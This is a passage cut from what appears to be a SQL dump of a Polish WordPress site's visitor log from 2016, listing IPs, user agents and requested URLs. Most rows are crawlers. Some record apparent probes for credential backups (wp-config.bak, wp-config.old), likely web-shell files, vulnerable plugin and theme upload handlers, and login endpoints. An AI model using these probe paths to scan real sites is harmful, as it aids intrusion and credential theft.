(compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://pc-one.pl/robots.txt'),(96825,'2016-02-16 19:45:07','77.75.76.162','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/o-nas/'),(96851,'2016-02-17 00:07:52','77.75.77.17','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/robots.txt'),(96850,'2016-02-16 23:22:29','195.154.226.90','','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','http://www.pc-one.pl/wp-trackback.php'),(96853,'2016-02-17 01:00:03','38.99.62.91','','Mozilla/5.0 (compatible; evc-batch/2.0)','http://www.pc-one.pl/'),(96868,'2016-02-17 10:53:21','192.243.55.133','','Mozilla/5.0 (compatible; SemrushBot/1~bl; +http://www.semrush.com/bot.html)','http://www.pc-one.pl/'),(96867,'2016-02-17 10:49:07','192.243.55.131','','Mozilla/5.0 (compatible; SemrushBot/1~bl; +http://www.semrush.com/bot.html)','http://pc-one.pl/'),(96866,'2016-02-17 10:48:31','192.243.55.131','','Mozilla/5.0 (compatible; SemrushBot/1~bl; +http://www.semrush.com/bot.html)','http://www.pc-one.pl/o-nas/'),(96859,'2016-02-17 05:36:52','202.46.58.59','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96864,'2016-02-17 07:36:28','207.46.13.184','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml.gz'),(96884,'2016-02-17 12:54:05','148.81.194.141','','Mozilla/5.0 (Nekstbot; http://nekst.ipipan.waw.pl/nekstbot/)','http://www.pc-one.pl/?p=25'),(96883,'2016-02-17 12:53:55','148.81.194.141','','Mozilla/5.0 (Nekstbot; http://nekst.ipipan.waw.pl/nekstbot/)','http://www.pc-one.pl/wp-content/plugins/wp-spamfree/js/wpsf-js.php'),(96882,'2016-02-17 12:53:43','148.81.194.141','','Mozilla/5.0 (Nekstbot; http://nekst.ipipan.waw.pl/nekstbot/)','http://www.pc-one.pl/tworzenie-stron/'),(96934,'2016-02-18 20:45:32','91.200.12.24','http://www.pc-one.pl/wp-content/themes/rayoflight-theme/functions/upload-handler.php','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36','http://www.pc-one.pl/wp-content/themes/rayoflight-theme/functions/upload-handler.php'),(96932,'2016-02-18 16:40:07','207.46.13.41','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/robots.txt'),(96957,'2016-02-19 06:42:56','199.187.122.91','','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)','http://www.pc-one.pl/feed/'),(96983,'2016-02-25 21:13:03','202.46.54.24','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96981,'2016-02-25 14:21:09','202.46.50.185','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(96997,'2016-02-29 20:32:57','202.46.54.28','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97014,'2016-03-09 11:59:52','202.46.52.103','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97010,'2016-03-08 12:25:37','202.46.54.30','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97011,'2016-03-08 12:25:41','202.46.53.125','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96703,'2016-02-14 05:09:17','208.90.57.196','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','http://www.pc-one.pl/'),(96702,'2016-02-14 05:05:45','176.10.99.204','http://hvd-store.com/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://www.pc-one.pl/'),(96698,'2016-02-14 03:40:03','66.249.64.124','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://pc-one.pl/'),(96696,'2016-02-14 00:33:20','207.46.13.16','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/'),(96694,'2016-02-13 22:22:01','157.55.39.43','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/robots.txt'),(96695,'2016-02-13 22:22:07','157.55.39.43','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/tworzenie-stron/'),(96754,'2016-02-15 09:39:55','95.32.70.153','','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.50 [en]','http://pc-one.pl/wp-config.bak'),(96753,'2016-02-15 09:10:08','82.145.72.245','http://www.pc-one.pl/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.pc-one.pl/wp-content/plugins/wp-spamfree/js/wpsf-js.php'),(96752,'2016-02-15 09:10:07','82.145.72.245','http://www.pc-one.pl/tworzenie-stron/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.pc-one.pl/'),(96751,'2016-02-15 09:10:05','82.145.72.245','http://www.pc-one.pl/tworzenie-stron/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.pc-one.pl/wp-content/plugins/wp-spamfree/js/wpsf-js.php'),(96757,'2016-02-15 12:26:34','207.46.13.16','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/'),(96756,'2016-02-15 11:04:53','68.180.229.41','','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','http://www.pc-one.pl/'),(96777,'2016-02-16 00:12:17','207.46.13.25','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/'),(96782,'2016-02-16 05:06:55','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/feed'),(96779,'2016-02-16 05:06:54','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://pc-one.pl/robots.txt'),(96781,'2016-02-16 05:06:55','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/'),(96780,'2016-02-16 05:06:54','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://pc-one.pl/'),(96818,'2016-02-16 16:22:41','77.75.79.62','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/tworzenie-stron/'),(96817,'2016-02-16 16:22:38','77.75.79.62','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/robots.txt'),(96816,'2016-02-16 15:39:52','93.159.230.28','http://www.pc-one.pl/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)','http://www.pc-one.pl/wp-content/plugins/wp-spamfree/js/wpsf-js.php'),(96815,'2016-02-16 15:39:52','93.159.230.28','','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)','http://www.pc-one.pl/'),(96805,'2016-02-16 09:29:36','180.76.15.9','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/robots.txt'),(96804,'2016-02-16 08:02:16','68.180.229.41','','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','http://www.pc-one.pl/sitemap-misc.xml'),(96803,'2016-02-16 08:02:16','68.180.229.41','','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','http://www.pc-one.pl/robots.txt'),(96822,'2016-02-16 18:05:29','5.248.41.200','','Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0','http://www.pc-one.pl/wp-login.php'),(96823,'2016-02-16 19:24:42','207.46.13.25','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/'),(96824,'2016-02-16 19:45:01','77.75.76.162','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/robots.txt'),(96856,'2016-02-17 01:58:24','208.115.113.86','','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','http://www.pc-one.pl/robots.txt'),(96848,'2016-02-16 22:43:10','14.97.2.176','http://www.pc-one.pl/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','http://www.pc-one.pl/wp-content/plugins/wp-spamfree/js/wpsf-js.php'),(96849,'2016-02-16 22:53:19','202.46.56.136','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96852,'2016-02-17 00:07:55','77.75.77.17','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/'),(96861,'2016-02-17 06:23:18','91.200.12.24','http://www.pc-one.pl/FCKeditor/_whatsnew.html','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36','http://www.pc-one.pl/FCKeditor/_whatsnew.html'),(96860,'2016-02-17 05:36:52','180.76.15.140','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/robots.txt'),(96858,'2016-02-17 05:36:50','202.46.57.22','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(96881,'2016-02-17 12:53:35','148.81.194.141','','Mozilla/5.0 (Nekstbot; http://nekst.ipipan.waw.pl/nekstbot/)','http://www.pc-one.pl/xmlrpc.php'),(96893,'2016-02-17 17:47:06','68.180.229.41','','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','http://www.pc-one.pl/robots.txt'),(96892,'2016-02-17 16:30:41','157.55.39.234','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml'),(96896,'2016-02-17 19:06:45','207.46.13.41','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/'),(96897,'2016-02-17 20:38:16','195.74.64.66','','Xenu Link Sleuth/1.3.8','http://www.pc-one.pl/'),(96889,'2016-02-17 14:37:13','66.249.64.81','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.pc-one.pl/'),(96894,'2016-02-17 17:47:07','68.180.229.41','','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','http://www.pc-one.pl/sitemap.xml'),(96909,'2016-02-18 07:48:30','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/plugins/LayerSlider/img/LICENSE.php'),(96908,'2016-02-18 07:48:30','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/plugins/LayerSlider/css/debug.php'),(96902,'2016-02-17 22:46:19','80.242.34.105','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) wkhtmltoimage Safari/534.34','http://www.pc-one.pl/'),(96907,'2016-02-18 07:48:29','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/plugins/LayerSlider/css/LICENSE.php'),(96906,'2016-02-18 07:44:13','208.115.113.86','','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','http://www.pc-one.pl/robots.txt'),(96905,'2016-02-18 06:52:59','207.46.13.41','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/'),(96929,'2016-02-18 16:05:29','178.62.255.22','','SafeDNSBot (https://www.safedns.com/searchbot)','http://www.pc-one.pl/'),(96930,'2016-02-18 16:38:38','207.46.13.41','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/'),(96931,'2016-02-18 16:38:53','157.55.39.234','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/wp-content/plugins/wp-spamfree/js/wpsf-js.php'),(96948,'2016-02-19 04:33:08','37.229.45.201','','Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0','http://www.pc-one.pl/wp-login.php'),(96954,'2016-02-19 06:12:05','66.249.66.131','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.pc-one.pl/robots.txt'),(96953,'2016-02-19 05:55:43','188.120.245.244','http://pc-one.pl/xmlrpc.php','Mozilla/4.78 (Windows NT 5.0; U) Opera 7.01 [en]','http://pc-one.pl/xmlrpc.php'),(96962,'2016-02-19 15:37:40','157.55.39.234','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml'),(96960,'2016-02-19 13:03:43','207.46.13.41','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/'),(96961,'2016-02-19 15:37:34','157.55.39.234','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/robots.txt'),(96979,'2016-02-24 08:54:45','202.46.52.107','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96982,'2016-02-25 14:21:11','202.46.50.136','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96986,'2016-02-26 18:22:36','192.243.55.129','','Mozilla/5.0 (compatible; SemrushBot/1~bl; +http://www.semrush.com/bot.html)','http://www.pc-one.pl/'),(96996,'2016-02-29 18:29:47','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97016,'2016-03-10 00:05:59','211.6.122.122','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97021,'2016-03-11 20:48:07','202.46.53.178','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97017,'2016-03-10 00:06:02','211.6.122.124','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96691,'2016-02-13 18:39:32','40.77.167.32','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml'),(96690,'2016-02-13 16:23:18','46.161.9.4','http://pc-one.pl/wp-content/plugins/acismittop/akismet.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36','http://www.pc-one.pl/'),(96689,'2016-02-13 16:23:18','46.161.9.4','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36','http://pc-one.pl/wp-content/plugins/acismittop/akismet.php'),(96692,'2016-02-13 18:40:26','40.77.167.32','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml'),(96693,'2016-02-13 20:28:55','74.63.253.58','','--user-agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0','http://www.pc-one.pl/'),(96705,'2016-02-14 06:49:37','207.46.13.140','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml.gz'),(96713,'2016-02-14 10:04:12','40.77.167.32','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/robots.txt'),(96710,'2016-02-14 09:33:11','31.207.134.232','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0','http://pc-one.pl/'),(96717,'2016-02-14 12:29:06','207.46.13.16','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/'),(96729,'2016-02-15 06:18:22','188.143.234.36','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/main.php'),(96731,'2016-02-15 06:18:23','188.143.234.36','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/dh.php'),(96732,'2016-02-15 06:18:23','188.143.234.36','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/symlink_3.php'),(96730,'2016-02-15 06:18:23','188.143.234.36','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/plugins/akismet/sh.php'),(96750,'2016-02-15 09:10:04','82.145.72.245','https://www.google.pl','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.pc-one.pl/tworzenie-stron/'),(96749,'2016-02-15 09:09:44','82.145.72.245','http://www.pc-one.pl/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.pc-one.pl/wp-content/plugins/wp-spamfree/js/wpsf-js.php'),(96748,'2016-02-15 09:09:44','82.145.72.245','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.pc-one.pl/'),(96743,'2016-02-15 09:00:13','66.249.64.124','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://pc-one.pl/robots.txt'),(96744,'2016-02-15 09:00:13','66.249.64.124','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://pc-one.pl/'),(96745,'2016-02-15 09:00:14','66.249.64.86','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.pc-one.pl/robots.txt'),(96755,'2016-02-15 11:04:52','68.180.229.41','','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','http://www.pc-one.pl/robots.txt'),(96763,'2016-02-15 16:17:23','213.180.146.29','http://www.pc-one.pl/','Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10','http://www.pc-one.pl/wp-content/plugins/wp-spamfree/js/wpsf-js.php'),(96762,'2016-02-15 16:17:23','213.180.146.29','','Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10','http://www.pc-one.pl/'),(96766,'2016-02-15 16:49:38','77.75.78.163','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/robots.txt'),(96765,'2016-02-15 16:38:54','95.32.70.153','','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar 4.4.1.1381; Hotbar 4.6.1)','http://pc-one.pl/wp-config.old'),(96802,'2016-02-16 07:35:07','207.46.13.25','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/'),(96799,'2016-02-16 07:29:16','40.77.167.32','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/robots.txt'),(96798,'2016-02-16 05:34:48','185.14.193.2','http://pc-one.pl/wp-content/themes/twentyfourteen/license.php','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','http://www.pc-one.pl/'),(96806,'2016-02-16 10:05:42','202.46.48.16','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(96809,'2016-02-16 14:09:23','213.180.150.93','','MyApp/0.1 libwww-perl/5.830','http://www.pc-one.pl/'),(96821,'2016-02-16 18:05:29','5.248.41.200','','Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0','http://www.pc-one.pl/wp-login.php'),(96820,'2016-02-16 17:37:52','66.249.78.99','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.pc-one.pl/'),(96832,'2016-02-16 20:36:35','69.58.178.56','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','http://www.pc-one.pl/o-nas/'),(96831,'2016-02-16 20:36:32','69.58.178.56','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','http://www.pc-one.pl/feed/'),(96830,'2016-02-16 20:36:30','69.58.178.56','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','http://www.pc-one.pl/feed/'),(96829,'2016-02-16 20:36:27','69.58.178.56','','BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 ips-agent','http://www.pc-one.pl/'),(96847,'2016-02-16 22:43:09','14.97.2.176','http://www.google.com/url?q=http%3A%2F%2Fpc-one.pl%2Fmap1.htm&sa=D&sntz=1&usg=AFQjCNGyg0vkTc_eLO46puLiI1zndW08hA','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','http://www.pc-one.pl/'),(96846,'2016-02-16 22:43:05','14.97.2.176','http://www.google.com/url?q=http%3A%2F%2Fpc-one.pl%2Fmap1.htm&sa=D&sntz=1&usg=AFQjCNGyg0vkTc_eLO46puLiI1zndW08hA','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','http://pc-one.pl/map1.htm'),(96844,'2016-02-16 21:26:38','178.62.255.242','','SafeDNSBot (https://www.safedns.com/searchbot)','http://www.pc-one.pl/'),(96845,'2016-02-16 21:26:39','66.249.64.86','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.pc-one.pl/'),(96843,'2016-02-16 21:26:38','66.249.64.124','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://pc-one.pl/'),(96842,'2016-02-16 21:26:38','178.62.255.242','','SafeDNSBot (https://www.safedns.com/searchbot)','http://www.pc-one.pl/robots.txt'),(96865,'2016-02-17 10:30:18','157.55.39.234','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml'),(96880,'2016-02-17 12:53:28','148.81.194.141','','Mozilla/5.0 (Nekstbot; http://nekst.ipipan.waw.pl/nekstbot/)','http://www.pc-one.pl/'),(96879,'2016-02-17 12:53:23','148.81.194.141','','Mozilla/5.0 (Nekstbot; http://nekst.ipipan.waw.pl/nekstbot/)','http://www.pc-one.pl/'),(96878,'2016-02-17 12:53:19','148.81.194.141','','Mozilla/5.0 (Nekstbot; http://nekst.ipipan.waw.pl/nekstbot/)','http://www.pc-one.pl/'),(96877,'2016-02-17 12:53:18','148.81.194.141','','Mozilla/5.0 (Nekstbot; http://nekst.ipipan.waw.pl/nekstbot/)','http://pc-one.pl/'),(96874,'2016-02-17 12:25:09','178.250.47.115','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6','http://pc-one.pl/'),(96875,'2016-02-17 12:25:10','178.250.47.115','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6','http://www.pc-one.pl/'),(96876,'2016-02-17 12:53:14','148.81.194.141','','Mozilla/5.0 (Nekstbot; http://nekst.ipipan.waw.pl/nekstbot/)','http://www.pc-one.pl/sitemap.xml.gz'),(96899,'2016-02-17 22:27:02','91.200.12.24','http://www.pc-one.pl/wp-content/plugins/reflex-gallery/readme.txt','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36','http://www.pc-one.pl/wp-content/plugins/reflex-gallery/readme.txt'),(96901,'2016-02-17 22:46:19','80.242.34.105','','Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0','http://www.pc-one.pl/'),(96927,'2016-02-18 13:49:16','40.77.167.67','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml.gz'),(96926,'2016-02-18 09:23:54','202.46.58.185','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/tworzenie-stron/'),(96925,'2016-02-18 08:59:14','208.115.113.86','','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','http://www.pc-one.pl/o-nas/feed/'),(96923,'2016-02-18 08:36:46','204.236.235.245','','ia_archiver','http://www.pc-one.pl/tworzenie-stron'),(96924,'2016-02-18 08:36:47','204.236.235.245','','ia_archiver','http://www.pc-one.pl/tworzenie-stron/'),(96933,'2016-02-18 16:40:07','207.46.13.41','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/robots.txt'),(96928,'2016-02-18 16:05:29','178.62.255.22','','SafeDNSBot (https://www.safedns.com/searchbot)','http://www.pc-one.pl/robots.txt'),(96952,'2016-02-19 05:46:19','77.75.79.119','','Mozilla/5.0 (compatible; SeznamBot/3.2; +http://fulltext.sblog.cz/)','http://www.pc-one.pl/sitemap-misc.xml.gz'),(96959,'2016-02-19 11:57:39','157.55.39.192','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml.gz'),(96972,'2016-02-21 23:23:34','202.46.49.130','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96991,'2016-02-28 00:42:18','202.46.54.20','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96993,'2016-02-28 21:24:02','202.46.54.29','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96995,'2016-02-29 05:38:24','202.46.55.140','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/feed/'),(97002,'2016-03-04 15:36:32','202.46.52.113','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97003,'2016-03-04 15:36:36','202.46.49.108','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97004,'2016-03-04 15:45:02','202.46.58.87','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97006,'2016-03-05 22:26:03','202.46.56.93','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/feed/'),(97035,'2016-03-16 20:29:15','202.46.58.153','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96576,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1','http://www.pc-one.pl/'),(96577,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) 